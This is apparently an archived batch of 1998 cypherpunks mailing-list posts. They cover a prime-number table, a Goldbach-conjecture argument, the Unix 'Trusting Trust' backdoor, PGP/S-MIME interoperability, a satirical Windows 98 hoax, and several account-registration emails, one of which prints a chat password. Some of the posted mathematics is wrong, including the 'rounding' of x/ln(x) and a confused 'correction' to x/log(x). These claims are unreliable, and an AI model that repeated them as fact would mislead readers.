> 2+4+2=8
> 2+4+4=10
> 2+4+6=12
> 2+4+10=16
> 
> 2+6+2=10
> 2+6+4=12
> 2+6+6=14
> 2+6+10=18
> 
> 
> 1st 1,000 Primes & their p-1's:
> 
>       p         p-1
>  -------------------------------
> 
>       2         1
>       3		2
>       5		4
>       7		6
>      11		10
>      13		12
>      17 	16
>      19		18
>      23		22
>      29		28
>      31		30
>      37		36
>      41		40
>      43		42
>      47		46
>      53		52
>      59		58
>      61 	60
>      67		66
>      71		70
>      73		72
>      79		78
>      83		82
>      89		88
>      97		96
>     101 	100
>     103
>     107
>     109
>     113
> 
> 
>     127    131    137    139    149    151    157    163    167    173
> 
> 
>     179    181    191    193    197    199    211    223    227    229
> 
> 
>     233    239    241    251    257    263    269    271    277    281
> 
> 
>     283    293    307    311    313    317    331    337    347    349
> 
> 
>     353    359    367    373    379    383    389    397    401    409
> 
> 
>     419    421    431    433    439    443    449    457    461    463
> 
>     467    479    487    491    499    503    509    521    523    541
> 
>     547    557    563    569    571    577    587    593    599    601
> 
>     607    613    617    619    631    641    643    647    653    659
> 
>     661    673    677    683    691    701    709    719    727    733
> 
>     739    743    751    757    761    769    773    787    797    809
> 
>     811    821    823    827    829    839    853    857    859    863
> 
>     877    881    883    887    907    911    919    929    937    941
> 
>     947    953    967    971    977    983    991    997   1009   1013
> 
>    1019   1021   1031   1033   1039   1049   1051   1061   1063   1069
> 
>    1087   1091   1093   1097   1103   1109   1117   1123   1129   1151
> 
>    1153   1163   1171   1181   1187   1193   1201   1213   1217   1223
> 
>    1229   1231   1237   1249   1259   1277   1279   1283   1289   1291
> 
>    1297   1301   1303   1307   1319   1321   1327   1361   1367   1373
> 
>    1381   1399   1409   1423   1427   1429   1433   1439   1447   1451
> 
>    1453   1459   1471   1481   1483   1487   1489   1493   1499   1511
> 
>    1523   1531   1543   1549   1553   1559   1567   1571   1579   1583
> 
>    1597   1601   1607   1609   1613   1619   1621   1627   1637   1657
> 
>    1663   1667   1669   1693   1697   1699   1709   1721   1723   1733
> 
>    1741   1747   1753   1759   1777   1783   1787   1789   1801   1811
> 
>    1823   1831   1847   1861   1867   1871   1873   1877   1879   1889
> 
>    1901   1907   1913   1931   1933   1949   1951   1973   1979   1987
> 
>    1993   1997   1999   2003   2011   2017   2027   2029   2039   2053
> 
>    2063   2069   2081   2083   2087   2089   2099   2111   2113   2129
> 
>    2131   2137   2141   2143   2153   2161   2179   2203   2207   2213
> 
>    2221   2237   2239   2243   2251   2267   2269   2273   2281   2287
> 
>    2293   2297   2309   2311   2333   2339   2341   2347   2351   2357
> 
>    2371   2377   2381   2383   2389   2393   2399   2411   2417   2423
> 
>    2437   2441   2447   2459   2467   2473   2477   2503   2521   2531
> 
>    2539   2543   2549   2551   2557   2579   2591   2593   2609   2617
> 
>    2621   2633   2647   2657   2659   2663   2671   2677   2683   2687
> 
>    2689   2693   2699   2707   2711   2713   2719   2729   2731   2741
> 
>    2749   2753   2767   2777   2789   2791   2797   2801   2803   2819
> 
>    2833   2837   2843   2851   2857   2861   2879   2887   2897   2903
> 
>    2909   2917   2927   2939   2953   2957   2963   2969   2971   2999
> 
>    3001   3011   3019   3023   3037   3041   3049   3061   3067   3079
> 
>    3083   3089   3109   3119   3121   3137   3163   3167   3169   3181
> 
>    3187   3191   3203   3209   3217   3221   3229   3251   3253   3257
> 
>    3259   3271   3299   3301   3307   3313   3319   3323   3329   3331
> 
>    3343   3347   3359   3361   3371   3373   3389   3391   3407   3413
> 
>    3433   3449   3457   3461   3463   3467   3469   3491   3499   3511
> 
>    3517   3527   3529   3533   3539   3541   3547   3557   3559   3571
> 
>    3581   3583   3593   3607   3613   3617   3623   3631   3637   3643
> 
>    3659   3671   3673   3677   3691   3697   3701   3709   3719   3727
> 
>    3733   3739   3761   3767   3769   3779   3793   3797   3803   3821
> 
>    3823   3833   3847   3851   3853   3863   3877   3881   3889   3907
> 
>    3911   3917   3919   3923   3929   3931   3943   3947   3967   3989
> 
>    4001   4003   4007   4013   4019   4021   4027   4049   4051   4057
> 
>    4073   4079   4091   4093   4099   4111   4127   4129   4133   4139
> 
>    4153   4157   4159   4177   4201   4211   4217   4219   4229   4231
> 
>    4241   4243   4253   4259   4261   4271   4273   4283   4289   4297
> 
>    4327   4337   4339   4349   4357   4363   4373   4391   4397   4409
> 
>    4421   4423   4441   4447   4451   4457   4463   4481   4483   4493
> 
>    4507   4513   4517   4519   4523   4547   4549   4561   4567   4583
> 
>    4591   4597   4603   4621   4637   4639   4643   4649   4651   4657
> 
>    4663   4673   4679   4691   4703   4721   4723   4729   4733   4751
> 
>    4759   4783   4787   4789   4793   4799   4801   4813   4817   4831
> 
>    4861   4871   4877   4889   4903   4909   4919   4931   4933   4937
> 
>    4943   4951   4957   4967   4969   4973   4987   4993   4999   5003
> 
>    5009   5011   5021   5023   5039   5051   5059   5077   5081   5087
> 
>    5099   5101   5107   5113   5119   5147   5153   5167   5171   5179
> 
>    5189   5197   5209   5227   5231   5233   5237   5261   5273   5279
> 
>    5281   5297   5303   5309   5323   5333   5347   5351   5381   5387
> 
>    5393   5399   5407   5413   5417   5419   5431   5437   5441   5443
> 
>    5449   5471   5477   5479   5483   5501   5503   5507   5519   5521
> 
>    5527   5531   5557   5563   5569   5573   5581   5591   5623   5639
> 
>    5641   5647   5651   5653   5657   5659   5669   5683   5689   5693
> 
>    5701   5711   5717   5737   5741   5743   5749   5779   5783   5791
> 
>    5801   5807   5813   5821   5827   5839   5843   5849   5851   5857
> 
>    5861   5867   5869   5879   5881   5897   5903   5923   5927   5939
> 
>    5953   5981   5987   6007   6011   6029   6037   6043   6047   6053
> 
>    6067   6073   6079   6089   6091   6101   6113   6121   6131   6133
> 
>    6143   6151   6163   6173   6197   6199   6203   6211   6217   6221
> 
>    6229   6247   6257   6263   6269   6271   6277   6287   6299   6301
> 
>    6311   6317   6323   6329   6337   6343   6353   6359   6361   6367
> 
>    6373   6379   6389   6397   6421   6427   6449   6451   6469   6473
> 
>    6481   6491   6521   6529   6547   6551   6553   6563   6569   6571
> 
>    6577   6581   6599   6607   6619   6637   6653   6659   6661   6673
> 
>    6679   6689   6691   6701   6703   6709   6719   6733   6737   6761
> 
>    6763   6779   6781   6791   6793   6803   6823   6827   6829   6833
> 
>    6841   6857   6863   6869   6871   6883   6899   6907   6911   6917
> 
>    6947   6949   6959   6961   6967   6971   6977   6983   6991   6997
> 
>    7001   7013   7019   7027   7039   7043   7057   7069   7079   7103
> 
>    7109   7121   7127   7129   7151   7159   7177   7187   7193   7207
> 
>    7211   7213   7219   7229   7237   7243   7247   7253   7283   7297
> 
>    7307   7309   7321   7331   7333   7349   7351   7369   7393   7411
> 
>    7417   7433   7451   7457   7459   7477   7481   7487   7489   7499
> 
>    7507   7517   7523   7529   7537   7541   7547   7549   7559   7561
> 
>    7573   7577   7583   7589   7591   7603   7607   7621   7639   7643
> 
>    7649   7669   7673   7681   7687   7691   7699   7703   7717   7723
> 
>    7727   7741   7753   7757   7759   7789   7793   7817   7823   7829
> 
>    7841   7853   7867   7873   7877   7879   7883   7901   7907   7919
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 26 Nov 1998 01:41:58 +0800
To: Martin Minow <cypherpunks@cyberpass.net
Subject: Re: Is Open Source safe? [Linux Weekly News]
In-Reply-To: <36595F29.C39B997A@brd.ie>
Message-ID: <3.0.5.32.19981124135414.008dec10@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Frank O'Dwyer <fod@brd.ie> opines:
>>Yes it does, but not quite in the same way. For example, I believe that
>>in days of yore some attackers managed to insert a back door into some
>>DEC OS by breaking into the coding environment (I don't recall the
>>details, does anyone else?).

At 09:43 AM 11/23/98 -0800, Martin Minow wrote:
><http://www.acm.org/classics/sep95/> describes how the inventors
>of Unix inserted a backdoor into the Unix login program. It's well
>worth reading. However, there is no indication that this trojan
>horse ever shipped to customers.

Well, try logging in as "ken", and I think the password was "nih" :-)
(At least when I was starting my Unix career, it was still common
to have logins "ken" and "dmr" around as a courtesy, though eventually
computer security changed that practice.)

Also, mixing up DEC and Unix has long tradition; back in 1979,
there was an article in one of the Oakland or SF papers about
"Hackers at Berkeley" cracking security on "the Unix, a computer 
made by DEC", which was really about abusing answerback on VT100s.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 25 Nov 1998 04:58:37 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: A bit more on Goldbach's and Primes (fwd)
Message-ID: <199811242017.OAA26647@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: A bit more on Goldbach's and Primes
> Date: Tue, 24 Nov 1998 13:18:13 -0600 (CST)
> From: ichudov@Algebra.Com (Igor Chudov @ home)

> According to the original conjecture, there are two prime numbers P1 and
> P2 such that N=p1+p2.
> 
> Rewriting this: N = 2 + (p1-1) + (p2-1).
> 
> That is, two plus two evens that are each one less than a prime.
> 
> That's eighth grade math.

No, shit. It's a pity nobody seem to have ever carried it through and
published it.

> > Process:
> > 
> > 1.	Pick an even number
> > 2.	Select largest prime that is smaller by at least 4.
> > 3.	Add 1.
> > 4.	The difference between 1 and 3 should be a p-1. Add one to the
> > 	difference and it must be in the list of primes. If it's not then
> 
> if it is not then it must have not been in the list of primes.

Exactly, I've a latter version that covers the various boundary conditions
and what they mean. 9 and 15 for example aren't prime so because that number
doesn't appear in the list of primes you know that this prime won't work as
a candidate and you go pick the next lower one.

If this is your only objection with this algorithm then I'm covered.

> > Observation:
> > 
> > This technique could be used to extrapolate potential unknown primes from
> > known primes since it produces a much smaller list of potential candidates 
> > than simply testing consecutive odds via a sieve. It also is not as porous
> > as Mersenne Prime tests.
> 
> Bullshit.
> 
> Your "technique" ASSUMES that you already know the "largest prime that
> is smaller by at least 4".

But you do. You have a list of known primes as I said originaly. Should have 
looked at the list of the first 1000 primes that was attached. If you don't
want an array you could always impliment a Seive of Eratosthanese for example
to generate them as required. This is an approach I'm looking at currently
with a Perl implimentation.

Hell, even if you start off with only 2 and 3 defined as prime you can
generate the others, though it doesn't appear to be sufficient to prove
primality. It does reduce the number of candidate odd numbers to examine for
primality.

Given [ 2, 3 ] and Goldbach's Extension:

6 = 2 + 2 + 2		p = 3, p = 3

8 = 2 + 2 + 4           p = 3, p = 5
 
We do a Seive of Eratosthanese and find 5 is prime so we now have:

[ 2, 3, 5 ]

10 = 2 + 4 + 4		p = 5, p = 5

12 = 2 + 4 + 6          p = 5, p = 7

So we check 7 and find it's prime and we now have:

[ 2, 3, 5, 7 ]

And so on.

The real advantage comes into play for very large primes since they get more
sparse implying that a strictly direct approach (eg applying a Seive to
every odd number) gets more and more non-primes to sift through. This
technique reduces that set considerably because it gives you a known list of
primes that you look through for existance.

> > 2+(largest_known_prime-1)+(next_smallest_unknown_prime-1)=big_even_number
> > 
> > So, we need a way of guestimating the magnitude of the next prime and pick
> > big_even_numbers that are appropriate.
> > 
> > Observation: For a given x the number of primes <x is limited by x/ln(x).
> >              So we could note the points where x/ln(x) increases by 1.
> > 
> 
> Your observation is incorrect.
> 
> Consider x = 8.  x/ln(x) =~ 3.84, but the number of primes < 8 (2,3,5,7) is
> 4, that is more than 8/ln(8).

I'd say round up the 3.84. This is modulo math so fractions like this are
impossible to deal with in this context because they aren't defined. The
normal process is that if a fraction is produced it rounds up to the next
larger integer (re the Camel & Banana problem).

It's not my observation. If you go and look on The Primes webpage or any
number theory book that covers limits on primes then you will find this
asymptote given as the most commenly used.

> I suggest checking observations more carefully.

I did, you should check your conclusions more carefuly before you jump into
something.



    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 25 Nov 1998 05:20:01 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Limit on number of primes....a (silly) typo...
Message-ID: <199811242042.OAA26750@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Just to let you know, 

I had typed x/ln(x) as the asymptotic limit for the number of primes less
than x.

This is incorrect. It should be,

x/log(x)

I guess I did it by habit. Sorry.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chat-register@yahoo-inc.com
Date: Wed, 25 Nov 1998 09:02:32 +0800
To: cypherpunks@toad.com
Subject: Registration confirmation - Yahoo! Chat
Message-ID: <199811250004.QAA06009@e4.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain



Welcome to Yahoo!
Please save this message for future reference.

This confirmation message is sent to all users when 
they create a new account with Yahoo. During registration
we require users to enter their email address.
This confirmation notice is then sent to that address.


If you DID NOT request this account, we encourage you to REMOVE 
it by doing the following:

If your email software supports it, you can simply click on 
the link below. Since this web address (URL) is quite long 
you may find it necessary to copy the entire URL and paste 
it into your Web browser.

http://edit.my.yahoo.com/config/remove_user?k=IXtKZI53f2J1aHdyeXw4jiF5Sjd3MnpOfDc1T2BlTnkhdUpONjZOMjU1MDQhc0pkf2Zz

If you are prompted for the deletion key when using the
URL above, please use the following deletion key:
IXtKZI53f2J1aHdyeXw4jiF5Sjd3MnpOfDc1T2BlTnkhdUpONjZOMjU1MDQhc0pkf2Zz

Or, if you do not have internet access, please reply 
to this email (and make sure to copy this entire email 
in your reply) with REMOVE as the subject line.

___________

Your Yahoo ID is: cypher_punk

You can return to Yahoo! Chat by going to
                http://chat.yahoo.com/

Your Yahoo! ID may be used to access any of the Yahoo! services
that request a Yahoo! ID, such as:

My Yahoo - http://my.yahoo.com
Yahoo Calendar - http://calendar.yahoo.com
Yahoo Chat - http://chat.yahoo.com
Yahoo Classifieds - http://classifieds.yahoo.com
Yahoo Clubs - http://clubs.yahoo.com
Yahoo Finance - http://quote.yahoo.com
Yahoo Games - http://play.yahoo.com
Yahoo Mail - http://mail.yahoo.com
Yahoo Message Boards - http://messages.yahoo.com
Yahoo Pager - http://pager.yahoo.com
Yahoo Travel - http://travel.yahoo.com


Your e-mail is: cypherpunks@toad.com

We will use this address is case you ever forget your 
Yahoo ID or password. We'll need an address to automatically 
send a response to you.  To change this address, go to 
http://my.yahoo.com and click on the Account Information
link at the top of the page.  The edit page will let you 
update your E-Mail address, and other personal information 
and preferences.

________

Yahoo! Accounts - Top Frequently Asked Questions (FAQ)

Q. How much is all this going to cost me?

A. Absolutely nothing. All Yahoo! information is paid for 
through advertising. 

Q. What if I forget my Yahoo! ID or password

A. Just click on the Help is Here link at the bottom of the 
login page. We'll ask you some basic questions to confirm 
your identity, then send you the information to the email 
address listed in your account.

Q.  How do I change my password or Yahoo! ID?

If you would like to change your Yahoo Password in My Yahoo!, 
just click Acct Info at the top of the page.  Unfortunately, 
we do not have the ability to change your Yahoo! ID. You will 
have to create a new account if you wish to have a new Yahoo! ID. 
Please note that if you do re-register, you will need to re-set 
all of your preferences for your My Yahoo! and other Yahoo!
personalized services.

Q. What is an Alias?

A.  Under your Yahoo! ID, you may add additional names for 
use in our various services, such as Chat and Classifieds.

Q. How is the Yahoo! ID stored?

A. Your Yahoo! ID is stored as a cookie on your computer.  
This way, you only need to login once. If you upgrade your 
computer software, change computers, delete your internet 
files, or click Sign Out at any time, it will clear the 
cookie from the computer's hard drive.  Just return to the
login page and enter your Yahoo! ID and Yahoo Password in 
the spaces provided and click Sign In to restore the information.  
You do not need to register again. 

Q. I use a public terminal, how do I sign out?

A. If you are using a public computer, you should always 
sign out to clear your Yahoo! ID and cookie from the computer's 
hard drive. Just click the Sign Out button or link near the top 
of the main page.

Thank you for using Yahoo!

[208.198.164.2]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 25 Nov 1998 01:29:27 +0800
To: <cypherpunks@EINSTEIN.ssz.com>
Subject: open source
Message-ID: <199811241513.QAA31885@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:48 AM 11/23/98 -0700, Jim Burnes - Denver wrote:
>Break into the coding environment?  Does that mean they broke into
>the VMS development shop?

It is reasonable to believe that the US government (and others)
finds a patriotic "contact" with access to source,
inside various big code shops (MSoft, Lotus, the corporation
formerly known as DEC, etc.)

If it were otherwise we would not be getting our tax dollars' worth,
eh?

--Maced aliens confide in my fugs










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 25 Nov 1998 01:28:01 +0800
To: <cypherpunks@EINSTEIN.ssz.com>
Subject: trusting code
Message-ID: <199811241515.QAA32114@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 01:12 PM 11/23/98 +0000, Frank O'Dwyer wrote:
>Vlad Stesin wrote:
>> I don't quite understand the logic behind this. The fact that the
>> program's source is available is itself a proof that there are no
>> backdoors. Anyone can read the source code and make sure it's OK.
>
>Anyone can, but does anyone? 

Yes we do, but applied skeptics also consider the problem is also trusting
your compiler, and the rest of the OS (incl. memory manager, keyboard driver, 
the email program your PGP utility may plug into, BIOS, etc.)

What version of Microsoft compilers will begin checking for
Mozilla code and compiling 'differently'?  

See Ritchie's Turing award article on Trusting Trust...










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 25 Nov 1998 06:40:37 +0800
To: cypherpunks@cyberpass.net
Subject: Cypherpunks with guns
Message-ID: <199811242151.NAA21976@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain





http://www.wired.com/news/news/culture/story/16433.html

A group of San Francisco Bay Area cypherpunks recently spent
hundreds of dollars per person on "defensive handgun" and "practical rifle"
courses at the Front Sight firearms training institute in Aptos, California. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 25 Nov 1998 08:58:23 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Pi(x) - How many primes below x?
Message-ID: <199811250025.SAA27462@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.utm.edu/research/primes/howmany.shtml#pi_def

>    Consequence Three: The chance of a random integer x being prime is
>    about 1/log(x)

>   1.1. pi(x) is the number of primes less than or equal to x

> [up]   2. The Prime Number Theorem: approximating pi(x)
> 
>    Even though the distribution of primes seems random (there are
>    (probably) infinitely many twin primes and there are (definitely)
>    arbitrarily large gaps between primes), the function pi(x) is
>    surprisingly well behaved: In fact, it has been proved (see the next
>    section) that:
>    
>      The Prime Number Theorem: The number of primes not exceeding x is
>      asymptotic to x/log x.
>      
>    In terms of pi(x) we would write:
>    
>      The Prime Number Theorem: pi(x) ~ x/log x.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sabres Webmaster <webmaster@afterfive.com>
Date: Wed, 25 Nov 1998 09:10:47 +0800
To: cypherpunks@toad.com
Subject: Buffalo Sabres Chat Registration
Message-ID: <9811250036.AA24783@exchange.afterfive.com>
MIME-Version: 1.0
Content-Type: text/plain



Following is your Chat information
     (Please save this info!)
-----------------------------------
username: cpunk
password: 4199

Remember, the username and password are both CASE SENSITIVE!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Netscape AOL Instant Messenger" <register@oreg-r01.web.aol.com>
Date: Wed, 25 Nov 1998 10:15:24 +0800
To: <cypherpunks@toad.com>
Subject: Netscape AOL Instant Messenger Confirmation (kB3bEjeb1I aohelsux)
Message-ID: <365BA4CD@oreg-r01.web.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for registering for Netscape AOL Instant Messenger!

Your registration for screen name aohelsux has been received.

Please reply to this message within 48 hours to complete
the registration process.  Simply reply to the present message
and type 'OK' as the text of your message.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BMM <bmm@minder.net>
Date: Wed, 25 Nov 1998 11:13:49 +0800
To: cypherpunks@minder.net
Subject: Announce - "Registration" Mail List
Message-ID: <Pine.LNX.3.96.981124214343.25918I-100000@waste.minder.net>
MIME-Version: 1.0
Content-Type: text/plain




In order to relieve the CDR list of some of the flood of "You have
successfully registered" messages, and because some people feel there
is a need for such a thing, I have created a new mailing list for the
specific purpose of being used for registering for online services,
reg@minder.net.  Subject lines of mail from the list with be prepended
with "[r]" for easy filtering, whether automated or by eye.





It is a majordomo list, so those who are familiar with majordomo can
subscribe in the usual fashion.  For those who are not familar with
majordomo, to subscribe send a message to "majordomo@minder.net" with
"subscribe reg" (without the quotes) in the body of the message.  

Cheers,

-Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <PaulMerrill@acm.org>
Date: Wed, 25 Nov 1998 11:41:17 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Netscape AOL Instant Messenger Confirmation (kB3bEjeb1I aohelsux)
In-Reply-To: <199811250241.DAA01847@replay.com>
Message-ID: <365B735E.4E839979@ACM.Org>
MIME-Version: 1.0
Content-Type: text/plain



Again, some clueless asshole that can't tell the difference between
solicited responses and Unsolicited spam mouths off.  If you would like
to talk about someone, talk about the jerk who set up an AIM name using
the outdated address, not the company that repsonded.

PHM

AKA PHMerrill@AOL.Com (among other names and addresses)

Anonymous wrote:
> 
> This does wonders for my opinion of AOL. Even the administration has no clue.
> 
> AOL administration spammed the Cypherpunks <cypherpunks@toad.com> list, using
> an address for Cypherpunks which has been defunct for over a year now, with:
> 
> >Thank you for registering for Netscape AOL Instant Messenger!
> >
> >Your registration for screen name aohelsux has been received.
> >
> >Please reply to this message within 48 hours to complete
> >the registration process.  Simply reply to the present message
> >and type 'OK' as the text of your message.
> 
> P.S. "Well they just responded to an address someone gave them," like
> certain advocates of AOL, lamers, and Microsoft we have on the list have
> said, is not an excuse. It's easy to set up domain validation. The spammers
> just don't care.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 25 Nov 1998 07:06:57 +0800
To: cypherpunks@cyberpass.net
Subject: :-)
Message-ID: <v04020a0ab280df5e5fd7@[62.136.30.77]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Tue, 24 Nov 1998 10:39:41 -0500
X-Authentication-Warning: qnx.com: localhost [127.0.0.1] didn't use HELO
protocol
To: 0xdeadbeef@substance.abuse.blackdown.org
Cc: bostic@bostic.com
Subject: Is there any Substance to this Email ??
Date: Tue, 24 Nov 1998 10:43:51 -0500
From: glen mccready <glen@qnx.com>
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
X-Mailing-List: <0xdeadbeef@substance.abuse.blackdown.org> archive/latest/274
X-Loop: 0xdeadbeef@substance.abuse.blackdown.org
Precedence: list
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org
Status: U


Forwarded-by: Chris Wedgwood <chris@cybernet.co.nz>

From: tph@longhorn.uucp (Tom Harrington)
Newsgroups: alt.folklore.computers
Subject: Re: Win 98 Snitch?
Message-ID: <7279b8$ahr1@eccws1.dearborn.ford.com>

Mark Statzer (mstatz@net66.om) wrote:

: Microsoft slapped two more lawsuit against one teenager and one
: retired worker for using pirated Windows 98 software.

: For your information on how Microsoft actually trace
: PIRATED/COPIED/UNLICENSED Windows 98:

: Whenever you logon into the Internet, during the verifying password
: duration. Your ISP (Internet Service provider eg:SingNET, PacNET,
: CyberNET, SwiftNET) will download a SUB-REGISTRY ENCRYPTED HEXADECIMAL
: (containing all your PROGRAMS serial numbers installed into Win98!!)
: file from your Windows 98 registry. Then they send this SUB-REGISTRY
: to Microsoft for verification. And ONLY Microsoft knows how to decode
: this encrypted hexadecimal file. If Microsoft verified that the serial
: numbers are authentic, then they WILL REGISTER THOSE NUMBERS FOR YOU
: A-U-T-O-M-A-T-C-A-L-L-Y !!!

: And if Microsoft denied those serial numbers, then they will send an
: E-Mail to the ISP you dialed into and your ISP will start tracing
: everyone who logons to their systems. That's why during sometime for
: no reason your Internet started slowing down. And if your ISP verified
: that the SUB-REGISTRY ENCRYPTED HEXADECIMAL file is yours, they will
: send
: your information over to Microsoft Singapore. And there they will
: decide whether to take actions or not.

And then, if they _do_ decide to take action, black helicopters start
circling your house, using mind-control rays to bend you to Microsoft's
will.  If this doesn't cut it (say, you're wearing a tin-foil hat), the
men in black show up and remove your whole computer, and then use their
memory-zapping thingy to erase any memory of ever having a computer.
You'll then be officially branded as a dangerous outlaw subversive type
(even though you no longer have your PIRATE/COPIED/UNLICENSED software,
you've demonstrated that you're the type of person who will _get_ such
software) and will not be able to get jobs, insurance, loans, etc.  MS
will tap your phone, and their agents will follow your every move.

: There is already 54 cases in Singapore regarding uses of
: PIRATE/COPIED/UNLICENSED Windows 98.

Finally, when the revolution comes, MS will see to it that your house is
high on the list of sites for the UN invaders to hit with tactical
nukes.

: Is there any Substance to this Email ??

It's all true.  I had to go public with this information, even though
the MS stormtroopers will doubtless show up at any second now.  The
people have a right to know.  DON'T EVER GO ON LINE!!!  YOUR LIFE
DEPENDS ON IT!!!!

: Do you Guys think that there exists such a registry in Windows 98
: Has microsoft sued anybody for illegal use of it ??

Sued?  SUED???!!?  When MS gets through with you, you're going to WISH
that they'd jusT SUED you!  These people are EVIL!!! They kidnapped my
dog and G$%<S-F4>@^<S-F6>RB. f
NO CARRIER

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 25 Nov 1998 08:00:34 +0800
To: cypherpunks@cyberpass.net
Subject: open-pgp / s/mime interoperability
Message-ID: <199811242259.WAA04469@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




On the IETF s/mime list Jon Callas (PGP/NAI employee and co-author of
IETF open-pgp draft for cypherpunks not following open-pgp) wrote:

: I'd like to note that PGP is supported by NAI, Microsoft, Novell,
: and more that are coming soon.

curious as to what form Microsoft support of PGP will come in.
Integrated PGP support with microsoft mail clients in later versions?

Jon also wrote:

: there is no reason why you can't have PGP
: messages backed by X.509 certificates, and it is trivial to use S/MIME
: with OpenPGP certificates.  I'm planning on writing a short
: informational RFC on how to do it once we all get RFC numbers for our
: respective systems.

open-pgp public keys aren't based on X.509 keys, so I would've thought
s/mime implementation would barf on them.  Are you basing this on the
fact that you can extract the actual public key and repackage it as an
X.509 public key?  In this way you could take the same key into the
X.509 / s/mime world, but you would lose open-pgp sigantures on the
key, so it would lose it's certification.

More recently we've been hearing that PGP6.x? or a future version of
PGP does or will allow one to carry along X.509 keys, or perhaps even
work directly with X.509 keys.  Is this what you are referring to?

(Separate question: any due date on the netscape plugin -- I want one
of those!)

Adam

(message from IETF s/mime list the above is quoted from below).

------- Start of forwarded message -------
Date: Mon, 09 Nov 1998 17:54:29 -0800
To: Stefan_Salzmann/HAM/Lotus@lotus.com, ietf-smime@imc.org
From: Jon Callas <jon@pgp.com>
Subject: Re: Difference between SMIME and PGP

At 05:20 PM 11/4/98 +0100, Stefan_Salzmann/HAM/Lotus@lotus.com wrote:
   
   I am struggling on the difference between SMIME and PGP. One of my
customers
   wants to make the decision between using SMIME and PGP. I have been talking
   already with them but we got stuck in detailes.
   
   Basically its quit clear. SMIME will be supported by all important industry
   leaders such as Netscape, Microsoft, Novell etc. 

I'd like to note that PGP is supported by NAI, Microsoft, Novell, and more
that are coming soon.

   Further SMIME supports the
   hierarchical trust model and PGP only supports the "web of trust" model. 

Actually, this is false. PGP supports all trust models, direct trust,
hierarchical trust, and web of trust. As I said in my previous message, PGP
supports 255 levels of hierarchy.

However, I forgot to say that OpenPGP does not mandate *any* trust model.
As a matter of fact, the OpenPGP working group has rejected any mandate of
trust model. You are permitted to use an OpenPGP certificate with PKIX
evaluation rules, and still be OpenPGP compliant!

   Now
   with PGP Version 6.0, PGP will support also X.509 certificates. Those
can also
   be loaded into an PGP client than an SMIME Client can do it.
   So where is the difference now? Is it just the fact that the industry
decided to
   go with SMIME or are there more differences (advantages for SMIME) when
looking
   more closely.

Actually, the industry hasn't decided to go with anything. Furthermore,
there is no reason why you can't have PGP messages backed by X.509
certificates, and it is trivial to use S/MIME with OpenPGP certificates.
I'm planning on writing a short informational RFC on how to do it once we
